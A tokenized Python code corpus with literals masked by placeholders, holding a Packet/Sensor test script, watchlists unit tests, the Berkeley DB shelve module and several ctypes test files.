object ( '<STR_LIT>' ) <EOL> cycle . update ( { <EOL> '<STR_LIT>' : Sum ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : Sum ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : <NUM_LIT:0> <EOL> } ) <EOL> print cycle [ '<STR_LIT>' ] <EOL> def sensor_test ( ) : <EOL> first = Packet ( ) <EOL> example1 , this = first . object ( '<STR_LIT>' ) <EOL> example1 . update ( { <EOL> '<STR_LIT:message>' : '<STR_LIT>' <EOL> } ) <EOL> output2 , this = first . object ( '<STR_LIT>' ) <EOL> output2 . update ( { <EOL> '<STR_LIT:message>' : '<STR_LIT>' <EOL> } ) <EOL> second = Packet ( ) <EOL> example2 , this = second . object ( '<STR_LIT>' ) <EOL> example2 . update ( { <EOL> '<STR_LIT:message>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> output1 , this = second . object ( '<STR_LIT>' ) <EOL> output1 . update ( { <EOL> '<STR_LIT:message>' : '<STR_LIT>' <EOL> } ) <EOL> def example_message ( unit ) : <EOL> for label , value in unit . itervalues ( ) : <EOL> if ( label == '<STR_LIT:message>' ) and ( '<STR_LIT>' in value ) : <EOL> return True <EOL> return False <EOL> def check_id ( unit ) : <EOL> for label , value in unit . itervalues ( ) : <EOL> if ( label == '<STR_LIT>' ) : <EOL> return True <EOL> return False <EOL> sensor1 = Sensor ( output1 ) <EOL> sensor1 . mandatory ( example_message ) <EOL> first . add_sensor ( sensor1 ) <EOL> first . commit ( ) <EOL> sensor2 = Sensor ( output2 ) <EOL> sensor2 . mandatory ( example_message ) <EOL> sensor2 . mandatory ( check_id ) <EOL> second . add_sensor ( sensor2 ) <EOL> second . commit ( ) <EOL> print first . objects . keys ( ) <EOL> for name in first . objects . keys ( ) : <EOL> if '<STR_LIT>' in name : <EOL> print first . objects [ name ] <EOL> print second . objects . keys ( ) <EOL> for name in second . objects . keys ( ) : <EOL> if '<STR_LIT>' in name : <EOL> print second . 
objects [ name ] <EOL> print first <EOL> print second <EOL> def schema_test ( ) : <EOL> packet = Packet ( ) <EOL> account , this = packet . object ( '<STR_LIT>' ) <EOL> account . update ( { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : - <NUM_LIT> , <EOL> '<STR_LIT>' : Sum ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) <EOL> } ) <EOL> Account = Schema ( total = account . get_key ( '<STR_LIT>' ) ) <EOL> account = Account ( account ) <EOL> print account . total ( ) <EOL> def derivation_test ( ) : <EOL> packet = Packet ( ) <EOL> task1 , this = packet . object ( '<STR_LIT>' ) <EOL> task1 . update ( { <EOL> '<STR_LIT:start>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT:end>' : Sum ( this ( '<STR_LIT:start>' ) , this ( '<STR_LIT>' ) ) <EOL> } ) <EOL> print task1 <EOL> task1 [ '<STR_LIT:start>' ] = <NUM_LIT:2> <EOL> print task1 <EOL> task2 , this = packet . object ( '<STR_LIT>' ) <EOL> task2 . update ( task1 ) <EOL> task2 . update ( { <EOL> '<STR_LIT:start>' : Get ( task1 , '<STR_LIT:end>' ) <EOL> } ) <EOL> print task2 <EOL> def main ( ) : <EOL> account_test ( ) <EOL> cycle_test ( ) <EOL> sensor_test ( ) <EOL> schema_test ( ) <EOL> derivation_test ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> type = '<STR_LIT>' <EOL> packages = { <EOL> '<STR_LIT>' : { } <EOL> } <EOL> versions = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import super_mox <EOL> import watchlists <EOL> class WatchlistsTest ( super_mox . SuperMoxTestBase ) : <EOL> def setUp ( self ) : <EOL> super_mox . SuperMoxTestBase . setUp ( self ) <EOL> self . mox . StubOutWithMock ( watchlists . Watchlists , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( watchlists . Watchlists , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( watchlists . logging , '<STR_LIT:error>' ) <EOL> def testMissingWatchlistsFileOK ( self ) : <EOL> """<STR_LIT>""" <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , [ ] ) <EOL> def testGarbledWatchlistsFileOK ( self ) : <EOL> """<STR_LIT>""" <EOL> contents = '<STR_LIT>' <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> watchlists . logging . error ( super_mox . mox . IgnoreArg ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , [ ] ) <EOL> def testNoWatchers ( self ) : <EOL> contents = """<STR_LIT>""" <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , [ ] ) <EOL> def testValidWatcher ( self ) : <EOL> watchers = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> contents = """<STR_LIT>""" % watchers <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . 
Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , watchers ) <EOL> def testMultipleWatchlistsTrigger ( self ) : <EOL> """<STR_LIT>""" <EOL> contents = """<STR_LIT>""" <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def testDuplicateWatchers ( self ) : <EOL> """<STR_LIT>""" <EOL> watchers = [ '<STR_LIT>' ] <EOL> contents = """<STR_LIT>""" % ( watchers , watchers ) <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( '<STR_LIT>' ) <EOL> self . assertEqual ( wl . GetWatchersForPaths ( [ '<STR_LIT>' ] ) , watchers ) <EOL> def testWinPathWatchers ( self ) : <EOL> """<STR_LIT>""" <EOL> watchers = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> contents = """<STR_LIT>""" % watchers <EOL> saved_sep = watchlists . os . sep <EOL> watchlists . os . sep = '<STR_LIT:\\>' <EOL> watchlists . Watchlists . _HasWatchlistsFile ( ) . AndReturn ( True ) <EOL> watchlists . Watchlists . _ContentsOfWatchlistsFile ( ) . AndReturn ( contents ) <EOL> self . mox . ReplayAll ( ) <EOL> wl = watchlists . Watchlists ( r'<STR_LIT>' ) <EOL> returned_watchers = wl . GetWatchersForPaths ( <EOL> [ r'<STR_LIT>' ] ) <EOL> watchlists . os . sep = saved_sep <EOL> self . assertEqual ( returned_watchers , watchers ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import unittest <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import cPickle <EOL> try : <EOL> from UserDict import DictMixin <EOL> except ImportError : <EOL> class DictMixin : pass <EOL> import db <EOL> def open ( filename , flags = db . DB_CREATE , mode = <NUM_LIT:0> <NUM_LIT> , filetype = db . DB_HASH , <EOL> dbenv = None , dbname = None ) : <EOL> """<STR_LIT>""" <EOL> if type ( flags ) == type ( '<STR_LIT>' ) : <EOL> sflag = flags <EOL> if sflag == '<STR_LIT:r>' : <EOL> flags = db . DB_RDONLY <EOL> elif sflag == '<STR_LIT>' : <EOL> flags = <NUM_LIT:0> <EOL> elif sflag == '<STR_LIT:w>' : <EOL> flags = db . DB_CREATE <EOL> elif sflag == '<STR_LIT:c>' : <EOL> flags = db . DB_CREATE <EOL> elif sflag == '<STR_LIT:n>' : <EOL> flags = db . DB_TRUNCATE | db . DB_CREATE <EOL> else : <EOL> raise db . DBError , "<STR_LIT>" <EOL> d = DBShelf ( dbenv ) <EOL> d . open ( filename , dbname , filetype , flags , mode ) <EOL> return d <EOL> class DBShelveError ( db . DBError ) : pass <EOL> class DBShelf ( DictMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dbenv = None ) : <EOL> self . db = db . DB ( dbenv ) <EOL> self . binary = <NUM_LIT:1> <EOL> def __del__ ( self ) : <EOL> self . close ( ) <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( self . db , name ) <EOL> def __len__ ( self ) : <EOL> return len ( self . db ) <EOL> def __getitem__ ( self , key ) : <EOL> data = self . db [ key ] <EOL> return cPickle . loads ( data ) <EOL> def __setitem__ ( self , key , value ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> self . db [ key ] = data <EOL> def __delitem__ ( self , key ) : <EOL> del self . db [ key ] <EOL> def keys ( self , txn = None ) : <EOL> if txn != None : <EOL> return self . db . keys ( txn ) <EOL> else : <EOL> return self . db . keys ( ) <EOL> def items ( self , txn = None ) : <EOL> if txn != None : <EOL> items = self . db . items ( txn ) <EOL> else : <EOL> items = self . db . 
items ( ) <EOL> newitems = [ ] <EOL> for k , v in items : <EOL> newitems . append ( ( k , cPickle . loads ( v ) ) ) <EOL> return newitems <EOL> def values ( self , txn = None ) : <EOL> if txn != None : <EOL> values = self . db . values ( txn ) <EOL> else : <EOL> values = self . db . values ( ) <EOL> return map ( cPickle . loads , values ) <EOL> def __append ( self , value , txn = None ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> return self . db . append ( data , txn ) <EOL> def append ( self , value , txn = None ) : <EOL> if self . get_type ( ) == db . DB_RECNO : <EOL> return self . __append ( value , txn = txn ) <EOL> raise DBShelveError , "<STR_LIT>" <EOL> def associate ( self , secondaryDB , callback , flags = <NUM_LIT:0> ) : <EOL> def _shelf_callback ( priKey , priData , realCallback = callback ) : <EOL> data = cPickle . loads ( priData ) <EOL> return realCallback ( priKey , data ) <EOL> return self . db . associate ( secondaryDB , _shelf_callback , flags ) <EOL> def get ( self , * args , ** kw ) : <EOL> data = apply ( self . db . get , args , kw ) <EOL> try : <EOL> return cPickle . loads ( data ) <EOL> except ( TypeError , cPickle . UnpicklingError ) : <EOL> return data <EOL> def get_both ( self , key , value , txn = None , flags = <NUM_LIT:0> ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> data = self . db . get ( key , data , txn , flags ) <EOL> return cPickle . loads ( data ) <EOL> def cursor ( self , txn = None , flags = <NUM_LIT:0> ) : <EOL> c = DBShelfCursor ( self . db . cursor ( txn , flags ) ) <EOL> c . binary = self . binary <EOL> return c <EOL> def put ( self , key , value , txn = None , flags = <NUM_LIT:0> ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> return self . db . 
put ( key , data , txn , flags ) <EOL> def join ( self , cursorList , flags = <NUM_LIT:0> ) : <EOL> raise NotImplementedError <EOL> class DBShelfCursor : <EOL> """<STR_LIT:U+0020>""" <EOL> def __init__ ( self , cursor ) : <EOL> self . dbc = cursor <EOL> def __del__ ( self ) : <EOL> self . close ( ) <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( self . dbc , name ) <EOL> def dup ( self , flags = <NUM_LIT:0> ) : <EOL> return DBShelfCursor ( self . dbc . dup ( flags ) ) <EOL> def put ( self , key , value , flags = <NUM_LIT:0> ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> return self . dbc . put ( key , data , flags ) <EOL> def get ( self , * args ) : <EOL> count = len ( args ) <EOL> method = getattr ( self , '<STR_LIT>' % count ) <EOL> apply ( method , args ) <EOL> def get_1 ( self , flags ) : <EOL> rec = self . dbc . get ( flags ) <EOL> return self . _extract ( rec ) <EOL> def get_2 ( self , key , flags ) : <EOL> rec = self . dbc . get ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def get_3 ( self , key , value , flags ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> rec = self . dbc . get ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def current ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_CURRENT ) <EOL> def first ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_FIRST ) <EOL> def last ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_LAST ) <EOL> def next ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_NEXT ) <EOL> def prev ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_PREV ) <EOL> def consume ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_CONSUME ) <EOL> def next_dup ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_NEXT_DUP ) <EOL> def next_nodup ( self , flags = <NUM_LIT:0> ) : return self . 
get_1 ( flags | db . DB_NEXT_NODUP ) <EOL> def prev_nodup ( self , flags = <NUM_LIT:0> ) : return self . get_1 ( flags | db . DB_PREV_NODUP ) <EOL> def get_both ( self , key , value , flags = <NUM_LIT:0> ) : <EOL> data = cPickle . dumps ( value , self . binary ) <EOL> rec = self . dbc . get_both ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def set ( self , key , flags = <NUM_LIT:0> ) : <EOL> rec = self . dbc . set ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def set_range ( self , key , flags = <NUM_LIT:0> ) : <EOL> rec = self . dbc . set_range ( key , flags ) <EOL> return self . _extract ( rec ) <EOL> def set_recno ( self , recno , flags = <NUM_LIT:0> ) : <EOL> rec = self . dbc . set_recno ( recno , flags ) <EOL> return self . _extract ( rec ) <EOL> set_both = get_both <EOL> def _extract ( self , rec ) : <EOL> if rec is None : <EOL> return None <EOL> else : <EOL> key , data = rec <EOL> return key , cPickle . loads ( data ) </s>
<s> import glob , os , sys , unittest , getopt , time <EOL> use_resources = [ ] <EOL> class ResourceDenied ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def is_resource_enabled ( resource ) : <EOL> """<STR_LIT>""" <EOL> if sys . _getframe ( ) . f_back . f_globals . get ( "<STR_LIT>" ) == "<STR_LIT:__main__>" : <EOL> return True <EOL> result = use_resources is not None and ( resource in use_resources or "<STR_LIT:*>" in use_resources ) <EOL> if not result : <EOL> _unavail [ resource ] = None <EOL> return result <EOL> _unavail = { } <EOL> def requires ( resource , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if sys . _getframe ( ) . f_back . f_globals . get ( "<STR_LIT>" ) == "<STR_LIT:__main__>" : <EOL> return <EOL> if not is_resource_enabled ( resource ) : <EOL> if msg is None : <EOL> msg = "<STR_LIT>" % resource <EOL> raise ResourceDenied ( msg ) <EOL> def find_package_modules ( package , mask ) : <EOL> import fnmatch <EOL> if hasattr ( package , "<STR_LIT>" ) : <EOL> path = package . __name__ . replace ( "<STR_LIT:.>" , os . path . sep ) <EOL> mask = os . path . join ( path , mask ) <EOL> for fnm in package . __loader__ . _files . iterkeys ( ) : <EOL> if fnmatch . fnmatchcase ( fnm , mask ) : <EOL> yield os . path . splitext ( fnm ) [ <NUM_LIT:0> ] . replace ( os . path . sep , "<STR_LIT:.>" ) <EOL> else : <EOL> path = package . __path__ [ <NUM_LIT:0> ] <EOL> for fnm in os . listdir ( path ) : <EOL> if fnmatch . fnmatchcase ( fnm , mask ) : <EOL> yield "<STR_LIT>" % ( package . __name__ , os . path . splitext ( fnm ) [ <NUM_LIT:0> ] ) <EOL> def get_tests ( package , mask , verbosity ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ] <EOL> skipped = [ ] <EOL> for modname in find_package_modules ( package , mask ) : <EOL> try : <EOL> mod = __import__ ( modname , globals ( ) , locals ( ) , [ '<STR_LIT:*>' ] ) <EOL> except ResourceDenied , detail : <EOL> skipped . append ( modname ) <EOL> if verbosity > <NUM_LIT:1> : <EOL> print >> sys . 
stderr , "<STR_LIT>" % ( modname , detail ) <EOL> continue <EOL> except Exception , detail : <EOL> print >> sys . stderr , "<STR_LIT>" % ( modname , detail ) <EOL> continue <EOL> for name in dir ( mod ) : <EOL> if name . startswith ( "<STR_LIT:_>" ) : <EOL> continue <EOL> o = getattr ( mod , name ) <EOL> if type ( o ) is type ( unittest . TestCase ) and issubclass ( o , unittest . TestCase ) : <EOL> tests . append ( o ) <EOL> return skipped , tests <EOL> def usage ( ) : <EOL> print __doc__ <EOL> return <NUM_LIT:1> <EOL> def test_with_refcounts ( runner , verbosity , testcase ) : <EOL> """<STR_LIT>""" <EOL> import gc <EOL> import ctypes <EOL> ptc = ctypes . _pointer_type_cache . copy ( ) <EOL> cfc = ctypes . _c_functype_cache . copy ( ) <EOL> wfc = ctypes . _win_functype_cache . copy ( ) <EOL> def cleanup ( ) : <EOL> ctypes . _pointer_type_cache = ptc . copy ( ) <EOL> ctypes . _c_functype_cache = cfc . copy ( ) <EOL> ctypes . _win_functype_cache = wfc . copy ( ) <EOL> gc . collect ( ) <EOL> test = unittest . makeSuite ( testcase ) <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> rc = sys . gettotalrefcount ( ) <EOL> runner . run ( test ) <EOL> cleanup ( ) <EOL> COUNT = <NUM_LIT:5> <EOL> refcounts = [ None ] * COUNT <EOL> for i in range ( COUNT ) : <EOL> rc = sys . gettotalrefcount ( ) <EOL> runner . run ( test ) <EOL> cleanup ( ) <EOL> refcounts [ i ] = sys . gettotalrefcount ( ) - rc <EOL> if filter ( None , refcounts ) : <EOL> print "<STR_LIT>" % testcase , refcounts <EOL> elif verbosity : <EOL> print "<STR_LIT>" % testcase <EOL> class TestRunner ( unittest . TextTestRunner ) : <EOL> def run ( self , test , skipped ) : <EOL> "<STR_LIT>" <EOL> result = self . _makeResult ( ) <EOL> startTime = time . time ( ) <EOL> test ( result ) <EOL> stopTime = time . time ( ) <EOL> timeTaken = stopTime - startTime <EOL> result . printErrors ( ) <EOL> self . stream . writeln ( result . separator2 ) <EOL> run = result . testsRun <EOL> if _unavail : <EOL> requested = _unavail . 
keys ( ) <EOL> requested . sort ( ) <EOL> self . stream . writeln ( "<STR_LIT>" % <EOL> ( run , run != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" , timeTaken , <EOL> len ( skipped ) , <EOL> len ( skipped ) != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" ) ) <EOL> self . stream . writeln ( "<STR_LIT>" % "<STR_LIT:U+002CU+0020>" . join ( requested ) ) <EOL> else : <EOL> self . stream . writeln ( "<STR_LIT>" % <EOL> ( run , run != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" , timeTaken ) ) <EOL> self . stream . writeln ( ) <EOL> if not result . wasSuccessful ( ) : <EOL> self . stream . write ( "<STR_LIT>" ) <EOL> failed , errored = map ( len , ( result . failures , result . errors ) ) <EOL> if failed : <EOL> self . stream . write ( "<STR_LIT>" % failed ) <EOL> if errored : <EOL> if failed : self . stream . write ( "<STR_LIT:U+002CU+0020>" ) <EOL> self . stream . write ( "<STR_LIT>" % errored ) <EOL> self . stream . writeln ( "<STR_LIT:)>" ) <EOL> else : <EOL> self . stream . writeln ( "<STR_LIT:OK>" ) <EOL> return result <EOL> def main ( * packages ) : <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" ) <EOL> except getopt . error : <EOL> return usage ( ) <EOL> verbosity = <NUM_LIT:1> <EOL> search_leaks = False <EOL> for flag , value in opts : <EOL> if flag == "<STR_LIT>" : <EOL> verbosity -= <NUM_LIT:1> <EOL> elif flag == "<STR_LIT>" : <EOL> verbosity += <NUM_LIT:1> <EOL> elif flag == "<STR_LIT>" : <EOL> try : <EOL> sys . gettotalrefcount <EOL> except AttributeError : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> return - <NUM_LIT:1> <EOL> search_leaks = True <EOL> elif flag == "<STR_LIT>" : <EOL> use_resources . extend ( value . 
split ( "<STR_LIT:U+002C>" ) ) <EOL> mask = "<STR_LIT>" <EOL> if args : <EOL> mask = args [ <NUM_LIT:0> ] <EOL> for package in packages : <EOL> run_tests ( package , mask , verbosity , search_leaks ) <EOL> def run_tests ( package , mask , verbosity , search_leaks ) : <EOL> skipped , testcases = get_tests ( package , mask , verbosity ) <EOL> runner = TestRunner ( verbosity = verbosity ) <EOL> suites = [ unittest . makeSuite ( o ) for o in testcases ] <EOL> suite = unittest . TestSuite ( suites ) <EOL> result = runner . run ( suite , skipped ) <EOL> if search_leaks : <EOL> runner = BasicTestRunner ( ) <EOL> for t in testcases : <EOL> test_with_refcounts ( runner , verbosity , t ) <EOL> return bool ( result . errors ) <EOL> class BasicTestRunner : <EOL> def run ( self , test ) : <EOL> result = unittest . TestResult ( ) <EOL> test ( result ) <EOL> return result </s>
<s> from ctypes import * <EOL> import unittest <EOL> import _ctypes_test <EOL> testdll = CDLL ( _ctypes_test . __file__ ) <EOL> def positive_address ( a ) : <EOL> if a >= <NUM_LIT:0> : <EOL> return a <EOL> import struct <EOL> num_bits = struct . calcsize ( "<STR_LIT:P>" ) * <NUM_LIT:8> <EOL> a += <NUM_LIT:1> L << num_bits <EOL> assert a >= <NUM_LIT:0> <EOL> return a <EOL> def c_wbuffer ( init ) : <EOL> n = len ( init ) + <NUM_LIT:1> <EOL> return ( c_wchar * n ) ( * init ) <EOL> class CharPointersTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_long <EOL> func . argtypes = None <EOL> def test_int_pointer_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_long <EOL> self . failUnlessEqual ( <NUM_LIT:0> , func ( <NUM_LIT:0> ) ) <EOL> ci = c_int ( <NUM_LIT:0> ) <EOL> func . argtypes = POINTER ( c_int ) , <EOL> self . failUnlessEqual ( positive_address ( addressof ( ci ) ) , <EOL> positive_address ( func ( byref ( ci ) ) ) ) <EOL> func . argtypes = c_char_p , <EOL> self . assertRaises ( ArgumentError , func , byref ( ci ) ) <EOL> func . argtypes = POINTER ( c_short ) , <EOL> self . assertRaises ( ArgumentError , func , byref ( ci ) ) <EOL> func . argtypes = POINTER ( c_double ) , <EOL> self . assertRaises ( ArgumentError , func , byref ( ci ) ) <EOL> def test_POINTER_c_char_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_char_p <EOL> func . argtypes = POINTER ( c_char ) , <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( "<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( None , func ( c_char_p ( None ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_char_p ( "<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_buffer ( "<STR_LIT>" ) ) ) <EOL> ca = c_char ( "<STR_LIT:a>" ) <EOL> self . 
failUnlessEqual ( "<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> def test_c_char_p_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_char_p <EOL> func . argtypes = c_char_p , <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( "<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( None , func ( c_char_p ( None ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_char_p ( "<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_buffer ( "<STR_LIT>" ) ) ) <EOL> ca = c_char ( "<STR_LIT:a>" ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> def test_c_void_p_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_char_p <EOL> func . argtypes = c_void_p , <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( "<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_char_p ( "<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( None , func ( c_char_p ( None ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_buffer ( "<STR_LIT>" ) ) ) <EOL> ca = c_char ( "<STR_LIT:a>" ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> func ( byref ( c_int ( ) ) ) <EOL> func ( pointer ( c_int ( ) ) ) <EOL> func ( ( c_int * <NUM_LIT:3> ) ( ) ) <EOL> try : <EOL> func . restype = c_wchar_p <EOL> except NameError : <EOL> pass <EOL> else : <EOL> self . failUnlessEqual ( None , func ( c_wchar_p ( None ) ) ) <EOL> self . failUnlessEqual ( u"<STR_LIT>" , func ( c_wchar_p ( u"<STR_LIT>" ) ) ) <EOL> def test_instance ( self ) : <EOL> func = testdll . 
_testfunc_p_p <EOL> func . restype = c_void_p <EOL> class X : <EOL> _as_parameter_ = None <EOL> func . argtypes = c_void_p , <EOL> self . failUnlessEqual ( None , func ( X ( ) ) ) <EOL> func . argtypes = None <EOL> self . failUnlessEqual ( None , func ( X ( ) ) ) <EOL> try : <EOL> c_wchar <EOL> except NameError : <EOL> pass <EOL> else : <EOL> class WCharPointersTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_int <EOL> func . argtypes = None <EOL> def test_POINTER_c_wchar_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_wchar_p <EOL> func . argtypes = POINTER ( c_wchar ) , <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( u"<STR_LIT>" , func ( u"<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( None , func ( c_wchar_p ( None ) ) ) <EOL> self . failUnlessEqual ( u"<STR_LIT>" , func ( c_wchar_p ( u"<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( u"<STR_LIT>" , func ( c_wbuffer ( u"<STR_LIT>" ) ) ) <EOL> ca = c_wchar ( "<STR_LIT:a>" ) <EOL> self . failUnlessEqual ( u"<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . failUnlessEqual ( u"<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> def test_c_wchar_p_arg ( self ) : <EOL> func = testdll . _testfunc_p_p <EOL> func . restype = c_wchar_p <EOL> func . argtypes = c_wchar_p , <EOL> c_wchar_p . from_param ( u"<STR_LIT>" ) <EOL> self . failUnlessEqual ( None , func ( None ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( u"<STR_LIT>" ) ) <EOL> self . failUnlessEqual ( None , func ( c_wchar_p ( None ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_wchar_p ( "<STR_LIT>" ) ) ) <EOL> self . failUnlessEqual ( "<STR_LIT>" , func ( c_wbuffer ( "<STR_LIT>" ) ) ) <EOL> ca = c_wchar ( "<STR_LIT:a>" ) <EOL> self . failUnlessEqual ( "<STR_LIT:a>" , func ( pointer ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> self . 
failUnlessEqual ( "<STR_LIT:a>" , func ( byref ( ca ) ) [ <NUM_LIT:0> ] ) <EOL> class ArrayTest ( unittest . TestCase ) : <EOL> def test ( self ) : <EOL> func = testdll . _testfunc_ai8 <EOL> func . restype = POINTER ( c_int ) <EOL> func . argtypes = c_int * <NUM_LIT:8> , <EOL> func ( ( c_int * <NUM_LIT:8> ) ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ) ) <EOL> def func ( ) : pass <EOL> CFUNCTYPE ( None , c_int * <NUM_LIT:3> ) ( func ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
